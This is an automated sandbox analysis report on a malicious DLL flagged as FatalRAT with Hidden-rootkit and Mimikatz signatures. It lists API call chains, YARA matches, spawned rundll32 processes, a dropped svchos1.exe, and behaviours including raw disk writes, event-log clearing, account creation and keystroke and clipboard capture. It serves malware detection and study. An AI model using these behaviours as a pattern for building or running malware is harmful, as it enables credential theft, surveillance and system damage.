Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_100029D0 printf,OpenClipboard,GlobalAlloc,GlobalLock,strstr,strstr,strstr,atoi,strstr,strstr,strstr,atoi,Sleep,Sleep,atoi,strstr,Sleep,Sleep,printf,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,9_2_100029D0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 9_2_10017BB0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,9_2_10017BB0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_100025B0 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,GlobalUnlock,CloseClipboard,5_2_100025B0
Source: C:\Windows\System32\loaddll32.exe, Code function: 5_2_1000B840 GetKeyState,Sleep,lstrlenA,GetKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,lstrcatA,lstrlenA,lstrcatA,lstrcatA,5_2_1000B840

E-Banking Fraud

Source: C:\Windows\System32\loaddll32.exe, Code function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe 5_2_1000BFE0
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: malloc,SetEvent,GetUserNameA,_strcmpi,Sleep,Sleep,sprintf,sprintf,sprintf,sprintf,free,strstr,strstr,strstr,lstrcatA,lstrcatA,lstrcatA,lstrcpyA,_strcmpi,free,free,CloseHandle,free,CloseHandle,CloseHandle,CloseHandle,CloseHandle,free, Applications\iexplore.exe 9_2_1000BFE0

                  System Summary

                  barindex
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: Detects Mimikatz strings | Author: Florian Roth
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: Detects FatalRAT | Author: ditekSHen
                  Source: 9.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 9.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 9.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 10.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 10.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 10.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 10.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 9.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Mimikatz strings | Author: Florian Roth
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects FatalRAT | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Mimikatz strings | Author: Florian Roth
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects FatalRAT | Author: ditekSHen
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Mimikatz strings | Author: Florian Roth
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects the Hidden public rootkit | Author: ditekSHen
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects FatalRAT | Author: ditekSHen
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, | 5_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_10010190 AttachConsole,AttachConsole,Sleep,AttachConsole,GetConsoleProcessList,GetConsoleProcessList,#823,GetConsoleProcessList,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,#825,FreeConsole,FreeConsole,Sleep,FreeConsole,TerminateProcess,swprintf,SHDeleteKeyA,OpenSCManagerA,OpenServiceA,CloseServiceHandle,DeleteService,CloseServiceHandle,CloseServiceHandle,GetSystemDirectoryA,GetSystemDirectoryA,lstrcatA,lstrcatA,DeleteFileA,DeleteFileA,GetSystemDirectoryA,lstrcatA,DeleteFileA,LocalFree,free,free,free,GetWindowsDirectoryA,GetCurrentProcess,IsWow64Process,DeleteFileA,SetServiceStatus,ExitProcess, | 5_2_10010190
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_10010640 ExitWindowsEx, | 5_2_10010640
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_10010640 ExitWindowsEx, | 9_2_10010640
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1000E670 CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, | 9_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe | Code function: String function: 1001B690 appears 31 times
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 1001B690 appears 31 times
                  Source: l10U7QN0CY.dll | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: l10U7QN0CY.dll, type: SAMPLE | Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 9.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.1010b380.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.1010b380.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.100fbd38.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.100fbd38.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 9.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 5.2.loaddll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, score = , reference = not set, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_TOOL_RTK_HiddenRootKit author = ditekSHen, description = Detects the Hidden public rootkit
                  Source: 10.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_FatalRAT author = ditekSHen, description = Detects FatalRAT
                  Source: l10U7QN0CY.dll | Binary string: \Device\QAssist\DosDevices\QAssistQAssist!InitializeDevice[irql:%d,pid:%d][error]: Error, device creation failed with code:%08x
                  Source: l10U7QN0CY.dll | Binary string: \Device\QAssist\DosDevices\QAssist
                  Source: l10U7QN0CY.dll | Binary string: \??\\Device\\SystemRoot\QAssist!CheckProtectedOperation[irql:%d,pid:%d][warning]: Warning, can't update initial state for process: %p
                  Source: l10U7QN0CY.dll | Binary string: \Device\
                  Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winDLL@20/1@0/0
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, | 5_2_100290C0
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle, | 5_2_1001B690
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_100290C0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle, | 9_2_100290C0
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1001B690 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,CloseHandle, | 9_2_1001B690
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1001B250 GetTickCount,GetVersionExA,getsockname,GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,GetDriveTypeA,GetDiskFreeSpaceExA,GetTickCount,GetTickCount,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetLastInputInfo,GetTickCount,_access,lstrcpyA, | 5_2_1001B250
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_100270F0 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, | 5_2_100270F0
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1001A100 CoInitialize,CoCreateInstance,GetDriveTypeA,SysFreeString,SysFreeString,CoUninitialize, | 5_2_1001A100
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep, | 5_2_1001EFD0
                  Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\Public\Documents\MM\svchos1.exe
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1460:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                  Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: l10U7QN0CY.dll | ReversingLabs: Detection: 68%
                  Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll"
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                  Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\l10U7QN0CY.dll,Shellex
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\l10U7QN0CY.dll",#1
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md C:\Users\Public\Documents\MM
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: mfc42.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: msvcp60.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: winmm.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: dwmapi.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: netapi32.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: wtsapi32.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: samcli.dll
                  Source: C:\Windows\System32\loaddll32.exe | Section loaded: netutils.dll
                  Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
                  Source: l10U7QN0CY.dll | Static file information: File size 1269760 > 1048576
                  Source: Binary string: F:\hidden-master\x64\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: Binary string: rundll32.pdb source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: rundll32.pdbGCTL source: rundll32.exe, 00000009.00000002.3726452574.0000000002ECA000.00000004.00000020.00020000.00000000.sdmp, svchos1.exe.9.dr
                  Source: Binary string: F:\hidden-master\Debug\QAssist.pdb source: loaddll32.exe, 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 00000009.00000002.3727419433.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, rundll32.exe, 0000000A.00000002.3727406006.00000000100FA000.00000008.00000001.01000000.00000004.sdmp, l10U7QN0CY.dll
                  Source: svchos1.exe.9.dr | Static PE information: 0x6A8F1B39 [Wed Aug 26 16:58:33 2026 UTC]
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_10014700 LoadLibraryA,GetProcAddress,#823,#823,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,strchr,strncat,strncat,strncat,strchr,RegQueryValueExA,wsprintfA,RegQueryValueExA,strchr,RegEnumKeyExA,wsprintfA,wsprintfA,RegEnumValueA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrcatA,#825,#825, | 5_2_10014700
                  Source: l10U7QN0CY.dll | Static PE information: section name: .rodata
                  Source: l10U7QN0CY.dll | Static PE information: section name: .rotext
                  Source: svchos1.exe.9.dr | Static PE information: section name: .didat
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_1002D080 push eax; ret | 5_2_1002D0AE
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_1002D080 push eax; ret | 9_2_1002D0AE

                  Persistence and Installation Behavior

                  Source: C:\Windows\System32\loaddll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 | 5_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exe | Code function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE0 | 9_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exe | Code function: 5_2_10025AA0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,NetUserAdd,#825,#825,wcscpy,#825,#825,NetLocalGroupAddMembers,#825,LocalFree, | 5_2_10025AA0
                  Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\Public\Documents\MM\svchos1.exe

                  Boot Survival

                  Source: C:\Windows\System32\loaddll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE05_2_1000E670
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,ExitWindowsEx,ExitProcess, \\.\PHYSICALDRIVE09_2_1000E670
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001EFD0 Shellex,#823,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,lstrcpyA,GetCurrentThreadId,PostThreadMessageA,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetCommandLineA,CreateMutexA,GetLastError,strstr,Sleep,Sleep,OpenSCManagerA,OpenServiceA,CloseServiceHandle,StartServiceA,CloseServiceHandle,CloseServiceHandle,ExitProcess,CloseServiceHandle,CloseServiceHandle,Sleep,Sleep,sprintf,ExitProcess,sprintf,sprintf,GetModuleFileNameA,sprintf,Sleep,sprintf,ExitProcess,Sleep,Sleep,Sleep,Sleep,5_2_1001EFD0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,5_2_1001D150
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001D150 IsWindowVisible,IsIconic,GetWindowTextA,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,strstr,9_2_1001D150
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1000E540 OpenEventLogA,ClearEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,5_2_1000E540
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10001140 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,#825,#825,#825,#825,5_2_10001140
                  Source: C:\Windows\System32\loaddll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\loaddll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\rundll32.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\conhost.exe  Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001D4A05_2_1001D4A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001DA705_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001D4A09_2_1001D4A0
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001DA709_2_1001DA70
                  Source: C:\Windows\System32\loaddll32.exe  Evasive API call chain: CreateMutex,DecisionNodes,Sleep  graph_5-21816
                  Source: C:\Windows\SysWOW64\rundll32.exe  Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                  Source: C:\Windows\System32\loaddll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,5_2_10019930
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: LocalAlloc,LocalAlloc,OpenSCManagerA,EnumServicesStatusA,EnumServicesStatusA,LocalAlloc,EnumServicesStatusA,lstrlenA,OpenServiceA,QueryServiceConfigA,LocalAlloc,QueryServiceConfigA,QueryServiceConfig2A,LocalAlloc,QueryServiceConfig2A,lstrcatA,lstrcatA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LocalFree,LocalFree,LocalFree,CloseServiceHandle,LocalFree,CloseServiceHandle,LocalReAlloc,9_2_10019930
                  Source: C:\Windows\System32\loaddll32.exe  Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)  graph_5-21955
                  Source: C:\Windows\System32\loaddll32.exeAPI coverage: 2.3 %
                  Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 2.5 %
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1001DA705_2_1001DA70
                  Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1001DA709_2_1001DA70
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_10009080 lstrlenA,wsprintfA,FindFirstFileA,LocalAlloc,LocalReAlloc,lstrlenA,FindNextFileA,LocalFree,FindClose,5_2_10009080
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100092A0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,5_2_100092A0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_100097D0 lstrlenA,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,?_Grow@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAE_NI_N@Z,#823,#825,wsprintfA,FindNextFileA,FindClose,5_2_100097D0
                  Source: C:\Windows\System32\loaddll32.exeCode function: 5_2_1002AB10 lstrcatA,lstrcatA,lstrcatA,FindFirstFileA,GetPrivateProfileStringA,lstrlenA,strstr,GetPrivateProfileStringA,lstrlenA,lstrlenA,LocalSize,LocalReAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,FindNextFileA,FindClose,5_2_1002AB10
